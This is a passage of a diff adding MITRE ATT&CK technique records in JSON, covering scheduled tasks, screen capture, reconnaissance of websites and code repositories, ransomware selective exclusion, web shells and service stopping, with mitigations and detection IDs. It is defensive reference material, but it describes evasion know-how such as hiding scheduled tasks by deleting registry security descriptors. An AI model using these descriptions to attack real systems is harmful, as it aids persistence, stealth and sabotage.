+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.626000+00:00\", \"old_value\": \"2026-04-06 13:58:22.807000+00:00\"}}}",
+                    "previous_version": "2.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0094: Cross-Platform Behavioral Detection of Scheduled Task/Job Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-11-27 14:58:00.429000+00:00",
+                    "modified": "2026-05-12 15:12:00.618000+00:00",
+                    "name": "Scheduled Task",
+                    "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1053/005",
+                            "external_id": "T1053.005"
+                        },
+                        {
+                            "source_name": "ProofPoint Serpent",
+                            "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
+                        },
+                        {
+                            "source_name": "Defending Against Scheduled Task Attacks in Windows Environments",
+                            "description": "Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.",
+                            "url": "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments"
+                        },
+                        {
+                            "source_name": "Twitter Leoloobeek Scheduled Task",
+                            "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved September 12, 2024.",
+                            "url": "https://x.com/leoloobeek/status/939248813465853953"
+                        },
+                        {
+                            "source_name": "Tarrask scheduled task",
+                            "description": "Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/"
+                        },
+                        {
+                            "source_name": "Microsoft Scheduled Task Events Win10",
+                            "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events"
+                        },
+                        {
+                            "source_name": "TechNet Scheduled Task Events",
+                            "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.",
+                            "url": "https://technet.microsoft.com/library/dd315590.aspx"
+                        },
+                        {
+                            "source_name": "Red Canary - Atomic Red Team",
+                            "description": "Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled Task/Job: Scheduled Task. Retrieved June 19, 2024.",
+                            "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"
+                        },
+                        {
+                            "source_name": "TechNet Autoruns",
+                            "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"
+                        },
+                        {
+                            "source_name": "TechNet Forum Scheduled Task Operational Setting",
+                            "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.",
+                            "url": "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen"
+                        },
+                        {
+                            "source_name": "SigmaHQ",
+                            "description": "Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule Task - Registry. Retrieved June 1, 2022.",
+                            "url": "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml"
+                        },
+                        {
+                            "source_name": "Stack Overflow",
+                            "description": "Stack Overflow. (n.d.). How to find the location of the Scheduled Tasks folder. Retrieved June 19, 2024.",
+                            "url": "https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Andrew Northern, @ex_raritas",
+                        "Bryan Campbell, @bry_campbell",
+                        "Selena Larson, @selenalarson",
+                        "Sittikorn Sangrattanapitak",
+                        "Zachary Abzug, @ZackDoesML"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.618000+00:00\", \"old_value\": \"2025-10-24 17:48:19.176000+00:00\"}}}",
+                    "previous_version": "1.8",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0441: Detection of Suspicious Scheduled Task Creation and Execution on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:25.060000+00:00",
+                    "modified": "2026-05-12 15:12:00.619000+00:00",
+                    "name": "Screen Capture",
+                    "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1113",
+                            "external_id": "T1113"
+                        },
+                        {
+                            "source_name": "CopyFromScreen .NET",
+                            "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8"
+                        },
+                        {
+                            "source_name": "Antiquated Mac Malware",
+                            "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.619000+00:00\", \"old_value\": \"2025-10-24 17:48:19.886000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0346: Detect Screen Capture via Commands and API Calls"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 16:48:04.509000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Search Open Websites/Domains",
+                    "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1593",
+                            "external_id": "T1593"
+                        },
+                        {
+                            "source_name": "SecurityTrails Google Hacking",
+                            "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved September 12, 2024.",
+                            "url": "https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks"
+                        },
+                        {
+                            "source_name": "Cyware Social Media",
+                            "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.",
+                            "url": "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e"
+                        },
+                        {
+                            "source_name": "ExploitDB GoogleHacking",
+                            "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.",
+                            "url": "https://www.exploit-db.com/google-hacking-database"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:10.188000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0856: Detection of Search Open Websites/Domains"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-08-09 13:01:43.314000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Code Repositories",
+                    "description": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.  \n\nAdversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). \n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1593/003",
+                            "external_id": "T1593.003"
+                        },
+                        {
+                            "source_name": "GitHub Cloud Service Credentials",
+                            "description": "Runa A. Sandvik. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved August 9, 2022.",
+                            "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matt Burrough, @mattburrough, Microsoft",
+                        "Vinayak Wadhwa, SAFE Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2025-10-24 17:48:56.790000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0805: Detection of Code Repositories"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9b00925a-7c4b-4e53-bfc8-9a6a806fde03",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-25 14:45:54.760000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Selective Exclusion",
+                    "description": "Adversaries may intentionally exclude certain files, folders, directories, file types, or system components from encryption or tampering during a ransomware or malicious payload execution. Some file extensions that adversaries may avoid encrypting include `.dll`, `.exe`, and `.lnk`.(Citation: Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024)  \n\nAdversaries may perform this behavior to avoid alerting users, to evade detection by security tools and analysts, or, in the case of ransomware, to ensure that the system remains operational enough to deliver the ransom notice. \n\nExclusions may target files and components whose corruption would cause instability, break core services, or immediately expose the attack. By carefully avoiding these areas, adversaries maintain system responsiveness while minimizing indicators that could trigger alarms or otherwise inhibit achieving their goals. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1679",
+                            "external_id": "T1679"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024",
+                            "description": "Anthony Galiette, Doel Santos. (2024, January 11). Medusa Ransomware Turning Your Files into Stone. Retrieved October 15, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 22:32:31.453000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0897: Detection of Selective Exclusion"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-12-13 16:46:18.927000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Web Shell",
+                    "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1505/003",
+                            "external_id": "T1505.003"
+                        },
+                        {
+                            "source_name": "NSA Cyber Mitigating Web Shells",
+                            "description": " NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.",
+                            "url": "https://github.com/nsacyber/Mitigating-Web-Shells"
+                        },
+                        {
+                            "source_name": "volexity_0day_sophos_FW",
+                            "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.",
+                            "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"
+                        },
+                        {
+                            "source_name": "Lee 2013",
+                            "description": "Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html"
+                        },
+                        {
+                            "source_name": "US-CERT Alert TA15-314A Web Shells",
+                            "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arnim Rupp, Deutsche Lufthansa AG"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2025-10-24 17:48:50.387000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0394: Web Shell Detection via Server Behavior and File Execution Chains"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-03-29 19:00:55.901000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Service Stop",
+                    "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure.(Citation: SecureWorks WannaCry Analysis)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nThreat actors may also disable or stop service in cloud environments. For example, by leveraging the `DisableAPIServiceAccess` API in AWS, a threat actor may prevent the service from creating service-linked roles on new accounts in the AWS Organization.(Citation: Datadog Security Labs Cloud Persistence 2025)(Citation: AWS DisableAWSServiceAccess)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1489",
+                            "external_id": "T1489"
+                        },
+                        {
+                            "source_name": "AWS DisableAWSServiceAccess",
+                            "description": "AWS. (n.d.). DisableAWSServiceAccess. Retrieved May 22, 2025.",
+                            "url": "https://docs.aws.amazon.com/organizations/latest/APIReference/API_DisableAWSServiceAccess.html"
+                        },
+                        {
+                            "source_name": "SecureWorks WannaCry Analysis",
+                            "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.",
+                            "url": "https://www.secureworks.com/research/wcry-ransomware-analysis"
+                        },
+                        {
+                            "source_name": "Datadog Security Labs Cloud Persistence 2025",
+                            "description": "Martin McCloskey. (2025, May 13). Tales from the cloud trenches: The Attacker doth persist too much, methinks. Retrieved May 22, 2025.",
+                            "url": "https://securitylabs.datadoghq.com/articles/tales-from-the-cloud-trenches-the-attacker-doth-persist-too-much/"
+                        },
+                        {
+                            "source_name": "Talos Olympic Destroyer 2018",
+                            "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.",
+                            "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+                        },
+                        {
+                            "source_name": "Crowdstrike Hypervisor Jackpotting Pt 2 2021",
+                            "description": "Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
+                        },
+                        {
+                            "source_name": "Novetta Blockbuster",
+                            "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.",
+                            "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:30.688000+00:00\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1030: Network Segmentation",
+                            "M1060: Out-of-Band Communications Channel"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0021: Behavioral Detection for Service Stop across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
